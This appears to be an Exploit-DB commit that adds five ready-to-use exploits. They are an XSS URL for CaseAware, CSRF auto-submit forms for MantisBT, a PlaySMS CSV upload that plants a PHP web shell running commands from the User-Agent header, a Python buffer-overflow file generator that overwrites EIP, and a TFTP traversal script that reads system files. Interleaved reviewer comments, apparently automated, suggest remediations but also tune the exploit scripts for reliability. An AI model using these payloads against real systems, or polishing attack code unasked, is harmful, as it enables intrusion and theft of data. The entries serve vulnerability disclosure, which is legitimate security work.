DB: 2017-05-22
5 new exploits Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC) Secure Auditor 3.0 - Directory Traversal KMCIS CaseAware - Cross-Site Scripting Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery PlaySMs 1.4 - 'import.php' Remote Code Execution
This commit is contained in:
parent
df07287e80
commit
6351914249
6 changed files with 401 additions and 0 deletions
|
@ -5503,6 +5503,7 @@ id,file,description,date,author,platform,type,port
|
|||
42019,platforms/multiple/dos/42019.txt,"Adobe Flash - Out-of-Bounds Read in Getting TextField Width",2017-05-17,"Google Security Research",multiple,dos,0
|
||||
42021,platforms/windows/dos/42021.txt,"Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation",2017-05-17,"Google Security Research",windows,dos,0
|
||||
42027,platforms/multiple/dos/42027.html,"Mozilla Firefox 50 < 55 - Stack Overflow Denial of Service",2017-05-17,"Geeknik Labs",multiple,dos,0
|
||||
42040,platforms/windows/dos/42040.py,"Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)",2017-05-19,"Chance Johnson",windows,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -15524,6 +15525,7 @@ id,file,description,date,author,platform,type,port
|
|||
42025,platforms/php/remote/42025.rb,"BuilderEngine 3.5.0 - Arbitrary File Upload and Execution (Metasploit)",2017-05-17,Metasploit,php,remote,80
|
||||
42026,platforms/xml/remote/42026.py,"Oracle PeopleSoft - XML External Entity to SYSTEM Remote Code Execution",2017-05-17,"Ambionics Security",xml,remote,0
|
||||
42031,platforms/win_x86-64/remote/42031.py,"Microsoft Windows Windows 7/2008 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445
|
||||
42041,platforms/windows/remote/42041.txt,"Secure Auditor 3.0 - Directory Traversal",2017-05-20,hyp3rlinx,windows,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -37879,3 +37881,6 @@ id,file,description,date,author,platform,type,port
|
|||
42037,platforms/java/webapps/42037.txt,"ManageEngine ServiceDesk Plus 9.0 - Authentication Bypass",2017-05-19,ByteM3,java,webapps,0
|
||||
42038,platforms/php/webapps/42038.txt,"PlaySMS 1.4 - Remote Code Execution",2017-05-19,"Touhid M.Shaikh",php,webapps,80
|
||||
42039,platforms/hardware/webapps/42039.txt,"D-Link DIR-600M Wireless N 150 - Authentication Bypass",2017-05-19,"Touhid M.Shaikh",hardware,webapps,0
|
||||
42042,platforms/php/webapps/42042.txt,"KMCIS CaseAware - Cross-Site Scripting",2017-05-20,justpentest,php,webapps,0
|
||||
42043,platforms/php/webapps/42043.txt,"Mantis Bug Tracker 1.3.10/2.3.0 - Cross-Site Request Forgery",2017-05-20,hyp3rlinx,php,webapps,0
|
||||
42044,platforms/php/webapps/42044.txt,"PlaySMs 1.4 - 'import.php' Remote Code Execution",2017-05-21,"Touhid M.Shaikh",php,webapps,0
|
||||
|
|
|
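Review bot: In the third hunk the new row for 42044 spells the product `PlaySMs 1.4` while the existing row for 42038 two lines above spells the same software `PlaySMS 1.4`; the index is searched by description, so the two should agree, `42044,platforms/php/webapps/42044.txt,"PlaySMS 1.4 - 'import.php' Remote Code Execution",2017-05-21,"Touhid M.Shaikh",php,webapps,0`. The commit title carries the same spelling. The two earlier hunks only add single index rows and raise nothing.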
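--- /dev/null
+++ b/platforms/php/webapps/42042.txt
@@ -0,0 +1,27 @@
+# Exploit Title: CaseAware Cross Site Scripting Vulnerability
+# Date: 20th May 2017
+# Exploit Author: justpentest
+# Vendor Homepage: https://caseaware.com/
+# Version: All the versions
+# Contact: transform2secure@gmail.com
+# CVE : 2017-5631
+
+Source: https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle
+
+1) Description:
+An issue with respect to input sanitization was discovered in KMCIS
+CaseAware. Reflected cross site scripting is present in the user parameter
+(i.e., "usr") that is transmitted in the login.php query string. So
+bascially username parameter is vulnerable to XSS.
+
+2) Exploit:
+
+https://caseaware.abc.com:4322/login.php?mid=0&usr=admin'><a
+HREF="javascript:alert('OPENBUGBOUNTY')">Click_ME<'
+----------------------------------------------------------------------------------------
+
+3) References:
+
+https://www.openbugbounty.org/incidents/228262/
+https://nvd.nist.gov/vuln/detail/CVE-2017-5631#vulnDescriptionTitle
+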
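Review bot: The header line `# CVE : 2017-5631` omits the `CVE-` prefix that the NVD link two lines below uses, so tooling that scans advisory headers for CVE identifiers will not match it; write `# CVE : CVE-2017-5631`. `# Version: All the versions` claims more than the PoC demonstrates — if only the instance in the PoC was verified, the header should say which version that was. The advisory states no remediation; the application-side fix is to HTML-encode the reflected `usr` value in login.php (or not echo it at all), and naming that next to the PoC would make the entry useful to defenders as well.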
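--- /dev/null
+++ b/platforms/php/webapps/42043.txt
@@ -0,0 +1,109 @@
+[+] Credits: John Page a.k.a hyp3rlinx
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+================
+www.mantisbt.org
+
+
+
+Product:
+=========
+Mantis Bug Tracker
+1.3.10 / v2.3.0
+
+
+MantisBT is a popular free web-based bug tracking system. It is written in PHP works with MySQL, MS SQL, and PostgreSQL databases.
+
+
+
+Vulnerability Type:
+========================
+CSRF Permalink Injection
+
+
+
+CVE Reference:
+==============
+CVE-2017-7620
+
+
+
+Security Issue:
+================
+Remote attackers can inject arbitrary permalinks into the mantisbt Web Interface if an authenticated user visits a malicious webpage.
+
+Vuln code in "string_api.php" PHP file, under mantis/core/ did not account for supplied backslashes.
+Line: 270
+
+# Check for URL's pointing to other domains
+
+if( 0 == $t_type || empty( $t_matches['script'] ) ||
+
+3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) {
+
+
+
+return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php';
+
+}
+
+
+
+# Start extracting regex matches
+
+$t_script = $t_matches['script'];
+$t_script_path = $t_matches['path'];
+
+
+
+
+Exploit/POC:
+=============
+<form action="http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP" method="POST">
+<script>document.forms[0].submit()</script>
+</form>
+
+OR
+
+<form action="http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0" method="POST">
+<script>document.forms[0].submit()</script>
+</form>
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: April 9, 2017
+Vendor Release Fix: May 15, 2017
+Vendor Disclosed: May 20, 2017
+May 20, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx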
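Review bot: The Disclosure Timeline records `Vendor Release Fix: May 15, 2017` but never names the release that carries the fix, so a reader cannot tell whether `1.3.10 / v2.3.0` under Product are the last affected versions or the first fixed ones; add a line such as `Fixed In: <fixed version — confirm against the vendor changelog>`. The quoted string_api.php excerpt is introduced with `Line: 270` without saying which of the two listed versions that line number belongs to, and the excerpt's blank lines suggest indentation was lost when it was pasted, so the `if(` condition and its `3 == $t_type && preg_match(...)` continuation read as separate statements. The one-sentence root cause ("did not account for supplied backslashes") would be clearer placed directly above the excerpt, next to the scheme check it refers to.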
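--- /dev/null
+++ b/platforms/php/webapps/42044.txt
@@ -0,0 +1,128 @@
+# Exploit Title: PlaySMS 1.4 Remote Code Execution using Phonebook import Function in import.php
+# Date: 21-05-2017
+# Software Link: https://playsms.org/download/
+# Version: 1.4
+# Exploit Author: Touhid M.Shaikh
+# Contact: http://twitter.com/touhidshaikh22
+# Website: http://touhidshaikh.com/
+# Category: webapps
+
+1. Description
+
+Code Execution using import.php
+
+We know import.php accept file and just read content
+not stored in server. But when we stored payload in our backdoor.csv
+and upload to phonebook. Its execute our payload and show on next page in field (in NAME,MOBILE,Email,Group COde,Tags) accordingly .
+
+In My case i stored my vulnerable code in my backdoor.csv files's Name field .
+
+But There is one problem in execution. Its only execute in built function and variable which is used in application.
+
+That why the server not execute our payload directly. Now i Use "<?php $a=$_SERVER['HTTP_USER_AGENT']; system($a); ?>" in name field and change our user agent to any command which u want to execute command. Bcz it not execute <?php system("id")?> directly .
+
+Example of my backdoor.csv file content
+----------------------MY FILE CONTENT------------------------------------
+Name Mobile Email Group code Tags
+<?php $t=$_SERVER['HTTP_USER_AGENT']; system($t); ?> 22
+
+--------------------MY FILE CONTENT END HERE-------------------------------
+
+
+
+For More Details : www.touhidshaikh.com/blog/
+
+For Video Demo : https://www.youtube.com/watch?v=KIB9sKQdEwE
+
+
+2. Proof of Concept
+
+Login as regular user (created user using index.php?app=main&inc=core_auth&route=register):
+
+Go to :
+http://127.0.0.1/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=list
+
+
+And Upload my malicious File.(backdoor.csv)
+and change our User agent.
+
+
+This is Form For Upload Phonebook.
+----------------------Form for upload CSV file ----------------------
+<form action=\"index.php?app=main&inc=feature_phonebook&route=import&op=import\" enctype=\"multipart/form-data\" method=POST>
+" . _CSRF_FORM_ . "
+<p>" . _('Please select CSV file for phonebook entries') . "</p>
+<p><input type=\"file\" name=\"fnpb\"></p>
+<p class=text-info>" . _('CSV file format') . " : " . _('Name') . ", " . _('Mobile') . ", " . _('Email') . ", " . _('Group code') . ", " . _('Tags') . "</p>
+<p><input type=\"submit\" value=\"" . _('Import') . "\" class=\"button\"></p>
+</form>
+------------------------------Form ends ---------------------------
+
+
+
+-------------Read Content and Display Content-----------------------
+
+case "import":
+$fnpb = $_FILES['fnpb'];
+$fnpb_tmpname = $_FILES['fnpb']['tmp_name'];
+$content = "
+<h2>" . _('Phonebook') . "</h2>
+<h3>" . _('Import confirmation') . "</h3>
+<div class=table-responsive>
+<table class=playsms-table-list>
+<thead><tr>
+<th width=\"5%\">*</th>
+<th width=\"20%\">" . _('Name') . "</th>
+<th width=\"20%\">" . _('Mobile') . "</th>
+<th width=\"25%\">" . _('Email') . "</th>
+<th width=\"15%\">" . _('Group code') . "</th>
+<th width=\"15%\">" . _('Tags') . "</th>
+</tr></thead><tbody>";
+if (file_exists($fnpb_tmpname)) {
+$session_import = 'phonebook_' . _PID_;
+unset($_SESSION['tmp'][$session_import]);
+ini_set('auto_detect_line_endings', TRUE);
+if (($fp = fopen($fnpb_tmpname, "r")) !== FALSE) {
+$i = 0;
+while ($c_contact = fgetcsv($fp, 1000, ',', '"', '\\')) {
+if ($i > $phonebook_row_limit) {
+break;
+}
+if ($i > 0) {
+$contacts[$i] = $c_contact;
+}
+$i++;
+}
+$i = 0;
+foreach ($contacts as $contact) {
+$c_gid = phonebook_groupcode2id($uid, $contact[3]);
+if (!$c_gid) {
+$contact[3] = '';
+}
+$contact[1] = sendsms_getvalidnumber($contact[1]);
+$contact[4] = phonebook_tags_clean($contact[4]);
+if ($contact[0] && $contact[1]) {
+$i++;
+$content .= "
+<tr>
+<td>$i.</td>
+<td>$contact[0]</td>
+<td>$contact[1]</td>
+<td>$contact[2]</td>
+<td>$contact[3]</td>
+<td>$contact[4]</td>
+</tr>";
+$k = $i - 1;
+$_SESSION['tmp'][$session_import][$k] = $contact;
+}
+}
+
+------------------------------code ends ---------------------------
+
+
+Bingoo.....
+
+
+*------------------My Friends---------------------------*
+|Pratik K.Tejani, Rehman, Taushif,Charles Babbage |
+*---------------------------------------------------*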
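Review bot: The quoted import.php excerpt pins the defect more precisely than the prose does: every CSV field is concatenated raw into `$content` at `<td>$contact[0]</td>` through `<td>$contact[4]</td>`, and only `$contact[1]` and `$contact[4]` pass through a cleaning function first, so the Name, Email and Group-code fields reach the confirmation page unencoded. The application-side fix is to encode each field as it enters the markup, e.g. `<td>" . htmlspecialchars($contact[0], ENT_QUOTES, 'UTF-8') . "</td>`, and the advisory would be more useful if it stated that as the remediation. The description's claim that the payload "only execute in built function and variable which is used in application" is not supported by the excerpt — how `$content` is rendered after this block is outside the quoted code, so that step should be marked as the author's inference. Two smaller points: `foreach ($contacts as $contact)` runs on an unset `$contacts` when the CSV holds only a header row, and `$i > $phonebook_row_limit` admits one row more than the limit.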
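--- /dev/null
+++ b/platforms/windows/dos/42040.py
@@ -0,0 +1,33 @@
+# Exploit Title: Sure Thing Disc Labeler - Stack Buffer Overflow (PoC)
+# Date: 5-19-17
+# Exploit Author: Chance Johnson (albatross@loftwing.net)
+# Vendor Homepage: http://www.surething.com/
+# Software Link: http://www.surething.com/disclabeler
+# Version: 6.2.138.0
+# Tested on: Windows 7 x64 / Windows 10
+#
+# Usage:
+# Open the project template generated by this script.
+# If a readable address is placed in AVread, no exception will be thrown
+# and a return pointer will be overwritten giving control over EIP when
+# the function returns.
+
+header = '\x4D\x56\x00\xFF\x0C\x00\x12\x00\x32\x41\x61\x33\x08\x00\x5E\x00'
+header += '\x61\x35\x41\x61\x36\x41\x61\x37\x41\x61\x38\x41\x61\x39\x41\x62'
+header += '\x30\x41\x62\x31\x41\x62\x32\x41\x62\x33\x41\x62\x34\x41\x62\x35'
+header += '\x41\x62\x36\x41\x78\x37\x41\x62\x38\x41\x62\x39\x41\x63\x30\x41'
+header += '\x0C\x00\x41\x63\x78\x1F\x00\x00\x41\x63\x34\x41\x63\x35\x41\x63'
+
+junk1 = 'D'*10968
+EIP = 'A'*4 # Direct RET overwrite
+junk2 = 'D'*24
+AVread = 'B'*4 # address of any readable memory
+junk3 = 'D'*105693
+
+buf = header + junk1 + EIP + junk2 + AVread + junk3
+
+print "[+] Creating file with %d bytes..." % len(buf)
+
+f=open("exp.std",'wb')
+f.write(buf)
+f.close()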
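Review bot: The generator ends with a bare `f=open("exp.std",'wb')` / `f.write(buf)` / `f.close()` triple, and the script is Python 2 only (`print` statement, a `str` buffer written to a `'wb'` handle), neither of which the header records; `with open("exp.std", "wb") as f: f.write(buf)` closes the handle on error, and a `# Python 2` line under `# Tested on:` would stop a reader from trying it under Python 3. The header comment calls this a `Stack Buffer Overflow (PoC)` while the files.csv row for 42040 calls it `Buffer Overflow (PoC)`; the two should agree. `EIP` and `AVread` carry inline comments but the five `header` lines do not — a one-line comment saying these bytes are the fixed prefix of a `.std` project template (per the Usage text) would help whoever triages the crash.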
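--- /dev/null
+++ b/platforms/windows/remote/42041.txt
@@ -0,0 +1,99 @@
+[+] Credits: John Page aka HYP3RLINX
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+====================
+www.secure-bytes.com
+
+
+
+Product:
+=====================
+Secure Auditor - v3.0
+
+Secure Auditor suite is a unified digital risk management solution for conducting automated audits on Windows, Oracle and SQL databases
+and Cisco devices.
+
+
+
+Vulnerability Type:
+===================
+Directory Traversal
+
+
+
+CVE Reference:
+==============
+CVE-2017-9024
+
+
+
+Security Issue:
+================
+Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure Cisco Auditor (SCA) 3.0, has a
+Directory Traversal issue in its TFTP Server, allowing attackers to read arbitrary files via ../ sequences in a pathname.
+
+
+
+
+Exploit/POC:
+=============
+import sys,socket
+
+print 'Secure Auditor v3.0 / Cisco Config Manager'
+print 'TFTP Directory Traversal Exploit'
+print 'Read ../../../../Windows/system.ini POC'
+print 'hyp3rlinx'
+
+HOST = raw_input("[IP]> ")
+FILE = '../../../../Windows/system.ini'
+PORT = 69
+
+PAYLOAD = "\x00\x01" #TFTP Read
+PAYLOAD += FILE+"\x00" #Read system.ini using directory traversal
+PAYLOAD += "netascii\x00" #TFTP Type
+
+s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+s.sendto(PAYLOAD, (HOST, PORT))
+out = s.recv(1024)
+s.close()
+
+print "Victim Data located on : %s " %(HOST)
+print out.strip()
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+==================================
+Vendor Notification: May 10, 2017
+No replies
+May 20, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx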
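Review bot: The PoC's `out = s.recv(1024)` is a blocking read on a UDP socket with no timeout, so when port 69 is closed or filtered the script never returns; `s.settimeout(5)` before `s.sendto(PAYLOAD, (HOST, PORT))`, with `socket.timeout` caught and reported, makes it terminate and tells the operator that nothing answered. `import sys,socket` imports `sys` without using it. The Disclosure Timeline records `No replies` from the vendor and the advisory offers no mitigation; since no fix is documented, it should state that the bundled TFTP service should be bound to a management interface and blocked from untrusted networks at the host firewall until the vendor ships a correction.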